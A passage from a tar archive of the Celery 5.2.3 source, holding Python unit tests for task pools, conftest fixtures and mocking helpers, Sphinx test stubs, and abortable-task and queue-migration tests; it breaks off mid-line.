x.fileno_to_outq[3] = Mock() reader = proc.outq._reader reader.poll.return_value = False x.handle_event(6) # KeyError x.handle_event(3) x._recv_message.assert_called_with( hub.add_reader, 3, x.on_state_change, ) class test_TaskPool: def test_start(self): pool = TaskPool(10) pool.start() assert pool._pool.started assert pool._pool._state == asynpool.RUN _pool = pool._pool pool.stop() assert _pool.closed assert _pool.joined pool.stop() pool.start() _pool = pool._pool pool.terminate() pool.terminate() assert _pool.terminated def test_restart(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool.restart() pool._pool.restart.assert_called_with() pool._pool.apply_async.assert_called_with(mp.noop) def test_did_start_ok(self): pool = TaskPool(10) pool._pool = Mock(name='pool') assert pool.did_start_ok() is pool._pool.did_start_ok() def test_register_with_event_loop(self): pool = TaskPool(10) pool._pool = Mock(name='pool') loop = Mock(name='loop') pool.register_with_event_loop(loop) pool._pool.register_with_event_loop.assert_called_with(loop) def test_on_close(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool._pool._state = mp.RUN pool.on_close() pool._pool.close.assert_called_with() def test_on_close__pool_not_running(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool._pool._state = mp.CLOSE pool.on_close() pool._pool.close.assert_not_called() def test_apply_async(self): pool = TaskPool(10) pool.start() pool.apply_async(lambda x: x, (2,), {}) def test_grow_shrink(self): pool = TaskPool(10) pool.start() assert pool._pool._processes == 10 pool.grow() assert pool._pool._processes == 11 pool.shrink(2) assert pool._pool._processes == 9 def test_info(self): pool = TaskPool(10) procs = [Bunch(pid=i) for i in range(pool.limit)] class _Pool: _pool = procs _maxtasksperchild = None timeout = 10 soft_timeout = 5 def human_write_stats(self, *args, **kwargs): return {} pool._pool = _Pool() info = pool.info assert info['max-concurrency'] == pool.limit assert info['max-tasks-per-child'] == 'N/A' assert info['timeouts'] == (5, 10) def test_num_processes(self): pool = TaskPool(7) pool.start() assert pool.num_processes == 7 @patch('billiard.forking_enable') def test_on_start_proc_alive_timeout_default(self, __forking_enable): app = Mock(conf=AttributeDict(DEFAULTS)) pool = TaskPool(4, app=app) pool.on_start() assert pool._pool._proc_alive_timeout == 4.0 @patch('billiard.forking_enable') def test_on_start_proc_alive_timeout_custom(self, __forking_enable): app = Mock(conf=AttributeDict(DEFAULTS)) app.conf.worker_proc_alive_timeout = 8.0 pool = TaskPool(4, app=app) pool.on_start() assert pool._pool._proc_alive_timeout == 8.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_solo.py0000664000175000017500000000152000000000000021034 0ustar00asifasif00000000000000import operator from unittest.mock import Mock from celery import signals from celery.concurrency import solo from celery.utils.functional import noop class test_solo_TaskPool: def test_on_start(self): x = solo.TaskPool() x.on_start() def test_on_apply(self): x = solo.TaskPool() x.on_start() x.on_apply(operator.add, (2, 2), {}, noop, noop) def test_info(self): x = solo.TaskPool() x.on_start() assert x.info def test_on_worker_process_init_called(self): """Upon the initialization of a new solo worker pool a worker_process_init signal should be emitted""" on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) solo.TaskPool() assert on_worker_process_init.call_count == 1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_thread.py0000664000175000017500000000133000000000000021326 0ustar00asifasif00000000000000import operator import pytest from celery.utils.functional import noop class test_thread_TaskPool: def test_on_apply(self): from celery.concurrency import thread x = thread.TaskPool() try: x.on_apply(operator.add, (2, 2), {}, noop, noop) finally: x.stop() def test_info(self): from celery.concurrency import thread x = thread.TaskPool() try: assert x.info finally: x.stop() def test_on_stop(self): from celery.concurrency import thread x = thread.TaskPool() x.on_stop() with pytest.raises(RuntimeError): x.on_apply(operator.add, (2, 2), {}, noop, noop) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/conftest.py0000664000175000017500000005555200000000000016332 0ustar00asifasif00000000000000import builtins import inspect import io import logging import os import platform import sys import threading import types import warnings from contextlib import contextmanager from functools import wraps from importlib import import_module, reload from unittest.mock import MagicMock, Mock, patch import pytest from kombu import Queue from celery.backends.cache import CacheBackend, DummyClient # we have to import the pytest plugin fixtures here, # in case user did not do the `python setup.py develop` yet, # that installs the pytest plugin into the setuptools registry. from celery.contrib.pytest import (celery_app, celery_enable_logging, celery_parameters, depends_on_current_app) from celery.contrib.testing.app import TestApp, Trap from celery.contrib.testing.mocks import (TaskMessage, TaskMessage1, task_message_from_sig) # Tricks flake8 into silencing redefining fixtures warnings. __all__ = ( 'celery_app', 'celery_enable_logging', 'depends_on_current_app', 'celery_parameters' ) try: WindowsError = WindowsError except NameError: class WindowsError(Exception): pass PYPY3 = getattr(sys, 'pypy_version_info', None) and sys.version_info[0] > 3 CASE_LOG_REDIRECT_EFFECT = 'Test {0} didn\'t disable LoggingProxy for {1}' CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger' CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger' _SIO_write = io.StringIO.write _SIO_init = io.StringIO.__init__ SENTINEL = object() def noop(*args, **kwargs): pass class WhateverIO(io.StringIO): def __init__(self, v=None, *a, **kw): _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) def write(self, data): _SIO_write(self, data.decode() if isinstance(data, bytes) else data) @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'memory://', 'broker_transport_options': { 'polling_interval': 0.1 }, 'result_backend': 'cache+memory://', 'task_default_queue': 'testcelery', 'task_default_exchange': 'testcelery', 'task_default_routing_key': 'testcelery', 'task_queues': ( Queue('testcelery', routing_key='testcelery'), ), 'accept_content': ('json', 'pickle'), # Mongo results tests (only executed if installed and running) 'mongodb_backend_settings': { 'host': os.environ.get('MONGO_HOST') or 'localhost', 'port': os.environ.get('MONGO_PORT') or 27017, 'database': os.environ.get('MONGO_DB') or 'celery_unittests', 'taskmeta_collection': ( os.environ.get('MONGO_TASKMETA_COLLECTION') or 'taskmeta_collection' ), 'user': os.environ.get('MONGO_USER'), 'password': os.environ.get('MONGO_PASSWORD'), } } @pytest.fixture(scope='session') def use_celery_app_trap(): return True @pytest.fixture(autouse=True) def reset_cache_backend_state(celery_app): """Fixture that resets the internal state of the cache result backend.""" yield backend = celery_app.__dict__.get('backend') if backend is not None: if isinstance(backend, CacheBackend): if isinstance(backend.client, DummyClient): backend.client.cache.clear() backend._cache.clear() @contextmanager def assert_signal_called(signal, **expected): """Context that verifes signal is called before exiting.""" handler = Mock() def on_call(**kwargs): return handler(**kwargs) signal.connect(on_call) try: yield handler finally: signal.disconnect(on_call) handler.assert_called_with(signal=signal, **expected) @pytest.fixture def app(celery_app): yield celery_app @pytest.fixture(autouse=True, scope='session') def AAA_disable_multiprocessing(): # pytest-cov breaks if a multiprocessing.Process is started, # so disable them completely to make sure it doesn't happen. stuff = [ 'multiprocessing.Process', 'billiard.Process', 'billiard.context.Process', 'billiard.process.Process', 'billiard.process.BaseProcess', 'multiprocessing.Process', ] ctxs = [patch(s) for s in stuff] [ctx.__enter__() for ctx in ctxs] yield [ctx.__exit__(*sys.exc_info()) for ctx in ctxs] def alive_threads(): return [ thread for thread in threading.enumerate() if not thread.name.startswith("pytest_timeout ") and thread.is_alive() ] @pytest.fixture(autouse=True) def task_join_will_not_block(): from celery import _state, result prev_res_join_block = result.task_join_will_block _state.orig_task_join_will_block = _state.task_join_will_block prev_state_join_block = _state.task_join_will_block result.task_join_will_block = \ _state.task_join_will_block = lambda: False _state._set_task_join_will_block(False) yield result.task_join_will_block = prev_res_join_block _state.task_join_will_block = prev_state_join_block _state._set_task_join_will_block(False) @pytest.fixture(scope='session', autouse=True) def record_threads_at_startup(request): try: request.session._threads_at_startup except AttributeError: request.session._threads_at_startup = alive_threads() @pytest.fixture(autouse=True) def threads_not_lingering(request): yield assert request.session._threads_at_startup == alive_threads() @pytest.fixture(autouse=True) def AAA_reset_CELERY_LOADER_env(): yield assert not os.environ.get('CELERY_LOADER') @pytest.fixture(autouse=True) def test_cases_shortcuts(request, app, patching, celery_config): if request.instance: @app.task def add(x, y): return x + y # IMPORTANT: We set an .app attribute for every test case class. request.instance.app = app request.instance.Celery = TestApp request.instance.assert_signal_called = assert_signal_called request.instance.task_message_from_sig = task_message_from_sig request.instance.TaskMessage = TaskMessage request.instance.TaskMessage1 = TaskMessage1 request.instance.CELERY_TEST_CONFIG = celery_config request.instance.add = add request.instance.patching = patching yield if request.instance: request.instance.app = None @pytest.fixture(autouse=True) def sanity_no_shutdown_flags_set(): yield # Make sure no test left the shutdown flags enabled. from celery.worker import state as worker_state # check for EX_OK assert worker_state.should_stop is not False assert worker_state.should_terminate is not False # check for other true values assert not worker_state.should_stop assert not worker_state.should_terminate @pytest.fixture(autouse=True) def sanity_stdouts(request): yield from celery.utils.log import LoggingProxy assert sys.stdout assert sys.stderr assert sys.__stdout__ assert sys.__stderr__ this = request.node.name if isinstance(sys.stdout, (LoggingProxy, Mock)) or \ isinstance(sys.__stdout__, (LoggingProxy, Mock)): raise RuntimeError(CASE_LOG_REDIRECT_EFFECT.format(this, 'stdout')) if isinstance(sys.stderr, (LoggingProxy, Mock)) or \ isinstance(sys.__stderr__, (LoggingProxy, Mock)): raise RuntimeError(CASE_LOG_REDIRECT_EFFECT.format(this, 'stderr')) @pytest.fixture(autouse=True) def sanity_logging_side_effects(request): from _pytest.logging import LogCaptureHandler root = logging.getLogger() rootlevel = root.level roothandlers = [ x for x in root.handlers if not isinstance(x, LogCaptureHandler)] yield this = request.node.name root_now = logging.getLogger() if root_now.level != rootlevel: raise RuntimeError(CASE_LOG_LEVEL_EFFECT.format(this)) newhandlers = [x for x in root_now.handlers if not isinstance( x, LogCaptureHandler)] if newhandlers != roothandlers: raise RuntimeError(CASE_LOG_HANDLER_EFFECT.format(this)) def setup_session(scope='session'): using_coverage = ( os.environ.get('COVER_ALL_MODULES') or '--with-coverage' in sys.argv ) os.environ.update( # warn if config module not found C_WNOCONF='yes', KOMBU_DISABLE_LIMIT_PROTECTION='yes', ) if using_coverage and not PYPY3: from warnings import catch_warnings with catch_warnings(record=True): import_all_modules() warnings.resetwarnings() from celery._state import set_default_app set_default_app(Trap()) def teardown(): # Don't want SUBDEBUG log messages at finalization. try: from multiprocessing.util import get_logger except ImportError: pass else: get_logger().setLevel(logging.WARNING) # Make sure test database is removed. import os if os.path.exists('test.db'): try: os.remove('test.db') except OSError: pass # Make sure there are no remaining threads at shutdown. import threading remaining_threads = [thread for thread in threading.enumerate() if thread.getName() != 'MainThread'] if remaining_threads: sys.stderr.write( '\n\n**WARNING**: Remaining threads at teardown: %r...\n' % ( remaining_threads)) def find_distribution_modules(name=__name__, file=__file__): current_dist_depth = len(name.split('.')) - 1 current_dist = os.path.join(os.path.dirname(file), *([os.pardir] * current_dist_depth)) abs = os.path.abspath(current_dist) dist_name = os.path.basename(abs) for dirpath, dirnames, filenames in os.walk(abs): package = (dist_name + dirpath[len(abs):]).replace('/', '.') if '__init__.py' in filenames: yield package for filename in filenames: if filename.endswith('.py') and filename != '__init__.py': yield '.'.join([package, filename])[:-3] def import_all_modules(name=__name__, file=__file__, skip=('celery.decorators', 'celery.task')): for module in find_distribution_modules(name, file): if not module.startswith(skip): try: import_module(module) except ImportError: pass except OSError as exc: warnings.warn(UserWarning( 'Ignored error importing module {}: {!r}'.format( module, exc, ))) @pytest.fixture def sleepdeprived(request): """Mock sleep method in patched module to do nothing. Example: >>> import time >>> @pytest.mark.sleepdeprived_patched_module(time) >>> def test_foo(self, sleepdeprived): >>> pass """ module = request.node.get_closest_marker( "sleepdeprived_patched_module").args[0] old_sleep, module.sleep = module.sleep, noop try: yield finally: module.sleep = old_sleep # Taken from # http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py @pytest.fixture def mask_modules(request): """Ban some modules from being importable inside the context For example:: >>> @pytest.mark.masked_modules('gevent.monkey') >>> def test_foo(self, mask_modules): ... try: ... import sys ... except ImportError: ... print('sys not found') sys not found """ realimport = builtins.__import__ modnames = request.node.get_closest_marker("masked_modules").args def myimp(name, *args, **kwargs): if name in modnames: raise ImportError('No module named %s' % name) else: return realimport(name, *args, **kwargs) builtins.__import__ = myimp try: yield finally: builtins.__import__ = realimport @pytest.fixture def environ(request): """Mock environment variable value. Example:: >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings') >>> def test_other_settings(self, environ): ... ... """ env_name, env_value = request.node.get_closest_marker("patched_environ").args prev_val = os.environ.get(env_name, SENTINEL) os.environ[env_name] = env_value try: yield finally: if prev_val is SENTINEL: os.environ.pop(env_name, None) else: os.environ[env_name] = prev_val def replace_module_value(module, name, value=None): """Mock module value, given a module, attribute name and value. Example:: >>> replace_module_value(module, 'CONSTANT', 3.03) """ has_prev = hasattr(module, name) prev = getattr(module, name, None) if value: setattr(module, name, value) else: try: delattr(module, name) except AttributeError: pass try: yield finally: if prev is not None: setattr(module, name, prev) if not has_prev: try: delattr(module, name) except AttributeError: pass @contextmanager def platform_pyimp(value=None): """Mock :data:`platform.python_implementation` Example:: >>> with platform_pyimp('PyPy'): ... ... """ yield from replace_module_value(platform, 'python_implementation', value) @contextmanager def sys_platform(value=None): """Mock :data:`sys.platform` Example:: >>> mock.sys_platform('darwin'): ... ... """ prev, sys.platform = sys.platform, value try: yield finally: sys.platform = prev @contextmanager def pypy_version(value=None): """Mock :data:`sys.pypy_version_info` Example:: >>> with pypy_version((3, 6, 1)): ... ... """ yield from replace_module_value(sys, 'pypy_version_info', value) def _restore_logging(): outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ root = logging.getLogger() level = root.level handlers = root.handlers try: yield finally: sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs root.level = level root.handlers[:] = handlers @contextmanager def restore_logging_context_manager(): """Restore root logger handlers after test returns. Example:: >>> with restore_logging_context_manager(): ... setup_logging() """ yield from _restore_logging() @pytest.fixture def restore_logging(request): """Restore root logger handlers after test returns. Example:: >>> def test_foo(self, restore_logging): ... setup_logging() """ yield from _restore_logging() @pytest.fixture def module(request): """Mock one or modules such that every attribute is a :class:`Mock`.""" yield from _module(*request.node.get_closest_marker("patched_module").args) @contextmanager def module_context_manager(*names): """Mock one or modules such that every attribute is a :class:`Mock`.""" yield from _module(*names) def _module(*names): prev = {} class MockModule(types.ModuleType): def __getattr__(self, attr): setattr(self, attr, Mock()) return types.ModuleType.__getattribute__(self, attr) mods = [] for name in names: try: prev[name] = sys.modules[name] except KeyError: pass mod = sys.modules[name] = MockModule(name) mods.append(mod) try: yield mods finally: for name in names: try: sys.modules[name] = prev[name] except KeyError: try: del(sys.modules[name]) except KeyError: pass class _patching: def __init__(self, monkeypatch, request): self.monkeypatch = monkeypatch self.request = request def __getattr__(self, name): return getattr(self.monkeypatch, name) def __call__(self, path, value=SENTINEL, name=None, new=MagicMock, **kwargs): value = self._value_or_mock(value, new, name, path, **kwargs) self.monkeypatch.setattr(path, value) return value def object(self, target, attribute, *args, **kwargs): return _wrap_context( patch.object(target, attribute, *args, **kwargs), self.request) def _value_or_mock(self, value, new, name, path, **kwargs): if value is SENTINEL: value = new(name=name or path.rpartition('.')[2]) for k, v in kwargs.items(): setattr(value, k, v) return value def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs): # alias to __call__ with the interface of pytest.monkeypatch.setattr if value is SENTINEL: value, name = name, None return self(target, value, name=name) def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs): # same as pytest.monkeypatch.setattr but default value is MagicMock value = self._value_or_mock(value, new, name, dic, **kwargs) self.monkeypatch.setitem(dic, name, value) return value def modules(self, *mods): modules = [] for mod in mods: mod = mod.split('.') modules.extend(reversed([ '.'.join(mod[:-i] if i else mod) for i in range(len(mod)) ])) modules = sorted(set(modules)) return _wrap_context(module_context_manager(*modules), self.request) def _wrap_context(context, request): ret = context.__enter__() def fin(): context.__exit__(*sys.exc_info()) request.addfinalizer(fin) return ret @pytest.fixture() def patching(monkeypatch, request): """Monkeypath.setattr shortcut. Example: .. code-block:: python >>> def test_foo(patching): >>> # execv value here will be mock.MagicMock by default. >>> execv = patching('os.execv') >>> patching('sys.platform', 'darwin') # set concrete value >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings') >>> # val will be of type mock.MagicMock by default >>> val = patching.setitem('path.to.dict', 'KEY') """ return _patching(monkeypatch, request) @contextmanager def stdouts(): """Override `sys.stdout` and `sys.stderr` with `StringIO` instances. >>> with conftest.stdouts() as (stdout, stderr): ... something() ... self.assertIn('foo', stdout.getvalue()) """ prev_out, prev_err = sys.stdout, sys.stderr prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__ mystdout, mystderr = WhateverIO(), WhateverIO() sys.stdout = sys.__stdout__ = mystdout sys.stderr = sys.__stderr__ = mystderr try: yield mystdout, mystderr finally: sys.stdout = prev_out sys.stderr = prev_err sys.__stdout__ = prev_rout sys.__stderr__ = prev_rerr @contextmanager def reset_modules(*modules): """Remove modules from :data:`sys.modules` by name, and reset back again when the test/context returns. Example:: >>> with conftest.reset_modules('celery.result', 'celery.app.base'): ... pass """ prev = { k: sys.modules.pop(k) for k in modules if k in sys.modules } try: for k in modules: reload(import_module(k)) yield finally: sys.modules.update(prev) def get_logger_handlers(logger): return [ h for h in logger.handlers if not isinstance(h, logging.NullHandler) ] @contextmanager def wrap_logger(logger, loglevel=logging.ERROR): """Wrap :class:`logging.Logger` with a StringIO() handler. yields a StringIO handle. Example:: >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio: ... ... ... sio.getvalue() """ old_handlers = get_logger_handlers(logger) sio = WhateverIO() siohandler = logging.StreamHandler(sio) logger.handlers = [siohandler] try: yield sio finally: logger.handlers = old_handlers @contextmanager def _mock_context(mock): context = mock.return_value = Mock() context.__enter__ = Mock() context.__exit__ = Mock() def on_exit(*x): if x[0]: raise x[0] from x[1] context.__exit__.side_effect = on_exit context.__enter__.return_value = context try: yield context finally: context.reset() @contextmanager def open(side_effect=None): """Patch builtins.open so that it returns StringIO object. :param side_effect: Additional side effect for when the open context is entered. Example:: >>> with mock.open(io.BytesIO) as open_fh: ... something_opening_and_writing_bytes_to_a_file() ... self.assertIn(b'foo', open_fh.getvalue()) """ with patch('builtins.open') as open_: with _mock_context(open_) as context: if side_effect is not None: context.__enter__.side_effect = side_effect val = context.__enter__.return_value = WhateverIO() val.__exit__ = Mock() yield val @contextmanager def module_exists(*modules): """Patch one or more modules to ensure they exist. A module name with multiple paths (e.g. gevent.monkey) will ensure all parent modules are also patched (``gevent`` + ``gevent.monkey``). Example:: >>> with conftest.module_exists('gevent.monkey'): ... gevent.monkey.patch_all = Mock(name='patch_all') ... ... """ gen = [] old_modules = [] for module in modules: if isinstance(module, str): module = types.ModuleType(module) gen.append(module) if module.__name__ in sys.modules: old_modules.append(sys.modules[module.__name__]) sys.modules[module.__name__] = module name = module.__name__ if '.' in name: parent, _, attr = name.rpartition('.') setattr(sys.modules[parent], attr, module) try: yield finally: for module in gen: sys.modules.pop(module.__name__, None) for module in old_modules: sys.modules[module.__name__] = module def _bind(f, o): @wraps(f) def bound_meth(*fargs, **fkwargs): return f(o, *fargs, **fkwargs) return bound_meth class MockCallbacks: def __new__(cls, *args, **kwargs): r = Mock(name=cls.__name__) cls.__init__(r, *args, **kwargs) for key, value in vars(cls).items(): if key not in ('__dict__', '__weakref__', '__new__', '__init__'): if inspect.ismethod(value) or inspect.isfunction(value): r.__getattr__(key).side_effect = _bind(value, r) else: r.__setattr__(key, value) return r ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8117568 celery-5.2.3/t/unit/contrib/0000775000175000017500000000000000000000000015557 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/__init__.py0000664000175000017500000000000000000000000017656 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8117568 celery-5.2.3/t/unit/contrib/proj/0000775000175000017500000000000000000000000016531 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/__init__.py0000664000175000017500000000000000000000000020630 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/conf.py0000664000175000017500000000026700000000000020035 0ustar00asifasif00000000000000import os import sys extensions = ['sphinx.ext.autodoc', 'celery.contrib.sphinx'] autodoc_default_flags = ['members'] sys.path.insert(0, os.path.abspath(os.path.dirname(__file__))) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/contents.rst0000664000175000017500000000013500000000000021117 0ustar00asifasif00000000000000Documentation =============== .. toctree:: :maxdepth: 2 .. automodule:: foo :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/foo.py0000664000175000017500000000037100000000000017667 0ustar00asifasif00000000000000from xyzzy import plugh # noqa from celery import Celery, shared_task app = Celery() @app.task def bar(): """Task. This is a sample Task. """ @shared_task def baz(): """Shared Task. This is a sample Shared Task. """ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/xyzzy.py0000664000175000017500000000016100000000000020316 0ustar00asifasif00000000000000from celery import Celery app = Celery() @app.task def plugh(): """This task is in a different module!""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_abortable.py0000664000175000017500000000255300000000000021130 0ustar00asifasif00000000000000from celery.contrib.abortable import AbortableAsyncResult, AbortableTask class test_AbortableTask: def setup(self): @self.app.task(base=AbortableTask, shared=False) def abortable(): return True self.abortable = abortable def test_async_result_is_abortable(self): result = self.abortable.apply_async() tid = result.id assert isinstance( self.abortable.AsyncResult(tid), AbortableAsyncResult) def test_is_not_aborted(self): self.abortable.push_request() try: result = self.abortable.apply_async() tid = result.id assert not self.abortable.is_aborted(task_id=tid) finally: self.abortable.pop_request() def test_is_aborted_not_abort_result(self): self.abortable.AsyncResult = self.app.AsyncResult self.abortable.push_request() try: self.abortable.request.id = 'foo' assert not self.abortable.is_aborted() finally: self.abortable.pop_request() def test_abort_yields_aborted(self): self.abortable.push_request() try: result = self.abortable.apply_async() result.abort() tid = result.id assert self.abortable.is_aborted(task_id=tid) finally: self.abortable.pop_request() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/contrib/test_migrate.py0000664000175000017500000002474300000000000020632 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from amqp import ChannelError from kombu import Connection, Exchange, Producer, Queue from kombu.transport.virtual import QoS from kombu.utils.encoding import ensure_bytes from celery.contrib.migrate import (State, StopFiltering, _maybe_queue, expand_dest, filter_callback, filter_status, migrate_task, migrate_tasks, move, move_by_idmap, move_by_taskmap, move_task_by_id, start_filter, task_id_eq, task_id_in) from t.unit import conftest # hack to ignore error at shutdown QoS.restore_at_shutdown = False def Message(body, exchange='exchange', routing_key='rkey', compression=None, content_type='application/json', content_encoding='utf-8'): return Mock( body=body, delivery_info={ 'exchange': exchange, 'routing_key': routing_key, }, headers={ 'compression': compression, }, content_type=content_type, content_encoding=content_encoding, properties={ 'correlation_id': isinstance(body, dict) and body['id'] or None } ) class test_State: def test_strtotal(self): x = State() assert x.strtotal == '?' x.total_apx = 100 assert x.strtotal == '100' def test_repr(self): x = State() assert repr(x) x.filtered = 'foo' assert repr(x) class test_move: @contextmanager def move_context(self, **kwargs): with patch('celery.contrib.migrate.start_filter') as start: with patch('celery.contrib.migrate.republish') as republish: pred = Mock(name='predicate') move(pred, app=self.app, connection=self.app.connection(), **kwargs) start.assert_called() callback = start.call_args[0][2] yield callback, pred, republish def msgpair(self, **kwargs): body = dict({'task': 'add', 'id': 'id'}, **kwargs) return body, Message(body) def test_move(self): with self.move_context() as (callback, pred, republish): pred.return_value = None body, message = self.msgpair() callback(body, message) message.ack.assert_not_called() republish.assert_not_called() pred.return_value = 'foo' callback(body, message) message.ack.assert_called_with() republish.assert_called() def test_move_transform(self): trans = Mock(name='transform') trans.return_value = Queue('bar') with self.move_context(transform=trans) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() with patch('celery.contrib.migrate.maybe_declare') as maybed: callback(body, message) trans.assert_called_with('foo') maybed.assert_called() republish.assert_called() def test_limit(self): with self.move_context(limit=1) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() with pytest.raises(StopFiltering): callback(body, message) republish.assert_called() def test_callback(self): cb = Mock() with self.move_context(callback=cb) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() callback(body, message) republish.assert_called() cb.assert_called() class test_start_filter: def test_start(self): with patch('celery.contrib.migrate.eventloop') as evloop: app = Mock() filt = Mock(name='filter') conn = Connection('memory://') evloop.side_effect = StopFiltering() app.amqp.queues = {'foo': Queue('foo'), 'bar': Queue('bar')} consumer = app.amqp.TaskConsumer.return_value = Mock(name='consum') consumer.queues = list(app.amqp.queues.values()) consumer.channel = conn.default_channel consumer.__enter__ = Mock(name='consumer.__enter__') consumer.__exit__ = Mock(name='consumer.__exit__') consumer.callbacks = [] def register_callback(x): consumer.callbacks.append(x) consumer.register_callback = register_callback start_filter(app, conn, filt, queues='foo,bar', ack_messages=True) body = {'task': 'add', 'id': 'id'} for callback in consumer.callbacks: callback(body, Message(body)) consumer.callbacks[:] = [] cb = Mock(name='callback=') start_filter(app, conn, filt, tasks='add,mul', callback=cb) for callback in consumer.callbacks: callback(body, Message(body)) cb.assert_called() on_declare_queue = Mock() start_filter(app, conn, filt, tasks='add,mul', queues='foo', on_declare_queue=on_declare_queue) on_declare_queue.assert_called() start_filter(app, conn, filt, queues=['foo', 'bar']) consumer.callbacks[:] = [] state = State() start_filter(app, conn, filt, tasks='add,mul', callback=cb, state=state, limit=1) stop_filtering_raised = False for callback in consumer.callbacks: try: callback(body, Message(body)) except StopFiltering: stop_filtering_raised = True assert state.count assert stop_filtering_raised class test_filter_callback: def test_filter(self): callback = Mock() filt = filter_callback(callback, ['add', 'mul']) t1 = {'task': 'add'} t2 = {'task': 'div'} message = Mock() filt(t2, message) callback.assert_not_called() filt(t1, message) callback.assert_called_with(t1, message) def test_task_id_in(): assert task_id_in(['A'], {'id': 'A'}, Mock()) assert not task_id_in(['A'], {'id': 'B'}, Mock()) def test_task_id_eq(): assert task_id_eq('A', {'id': 'A'}, Mock()) assert not task_id_eq('A', {'id': 'B'}, Mock()) def test_expand_dest(): assert expand_dest(None, 'foo', 'bar') == ('foo', 'bar') assert expand_dest(('b', 'x'), 'foo', 'bar') == ('b', 'x') def test_maybe_queue(): app = Mock() app.amqp.queues = {'foo': 313} assert _maybe_queue(app, 'foo') == 313 assert _maybe_queue(app, Queue('foo')) == Queue('foo') def test_filter_status(): with conftest.stdouts() as (stdout, stderr): filter_status(State(), {'id': '1', 'task': 'add'}, Mock()) assert stdout.getvalue() def test_move_by_taskmap(): with patch('celery.contrib.migrate.move') as move: move_by_taskmap({'add': Queue('foo')}) move.assert_called() cb = move.call_args[0][0] assert cb({'task': 'add'}, Mock()) def test_move_by_idmap(): with patch('celery.contrib.migrate.move') as move: move_by_idmap({'123f': Queue('foo')}) move.assert_called() cb = move.call_args[0][0] body = {'id': '123f'} assert cb(body, Message(body)) def test_move_task_by_id(): with patch('celery.contrib.migrate.move') as move: move_task_by_id('123f', Queue('foo')) move.assert_called() cb = move.call_args[0][0] body = {'id': '123f'} assert cb(body, Message(body)) == Queue('foo') class test_migrate_task: def test_removes_compression_header(self): x = Message('foo', compression='zlib') producer = Mock() migrate_task(producer, x.body, x) producer.publish.assert_called() args, kwargs = producer.publish.call_args assert isinstance(args[0], bytes) assert 'compression' not in kwargs['headers'] assert kwargs['compression'] == 'zlib' assert kwargs['content_type'] == 'application/json' assert kwargs['content_encoding'] == 'utf-8' assert kwargs['exchange'] == 'exchange' assert kwargs['routing_key'] == 'rkey' class test_migrate_tasks: def test_migrate(self, app, name='testcelery'): connection_kwargs = { 'transport_options': {'polling_interval': 0.01} } x = Connection('memory://foo', **connection_kwargs) y = Connection('memory://foo', **connection_kwargs) # use separate state x.default_channel.queues = {} y.default_channel.queues = {} ex = Exchange(name, 'direct') q = Queue(name, exchange=ex, routing_key=name) q(x.default_channel).declare() Producer(x).publish('foo', exchange=name, routing_key=name) Producer(x).publish('bar', exchange=name, routing_key=name) Producer(x).publish('baz', exchange=name, routing_key=name) assert x.default_channel.queues assert not y.default_channel.queues migrate_tasks(x, y, accept=['text/plain'], app=app) yq = q(y.default_channel) assert yq.get().body == ensure_bytes('foo') assert yq.get().body == ensure_bytes('bar') assert yq.get().body == ensure_bytes('baz') Producer(x).publish('foo', exchange=name, routing_key=name) callback = Mock() migrate_tasks(x, y, callback=callback, accept=['text/plain'], app=app) callback.assert_called() migrate = Mock() Producer(x).publish('baz', exchange=name, routing_key=name) migrate_tasks(x, y, callback=callback, migrate=migrate, accept=['text/plain'], app=app) migrate.assert_called() with patch('kombu.transport.virtual.Channel.queue_declare') as qd: def effect(*args, **kwargs): if kwargs.get('passive'): raise ChannelError('some channel error') return 0, 3, 0 qd.side_effect = effect migrate_tasks(x, y, app=app) x = Connection('memory://', 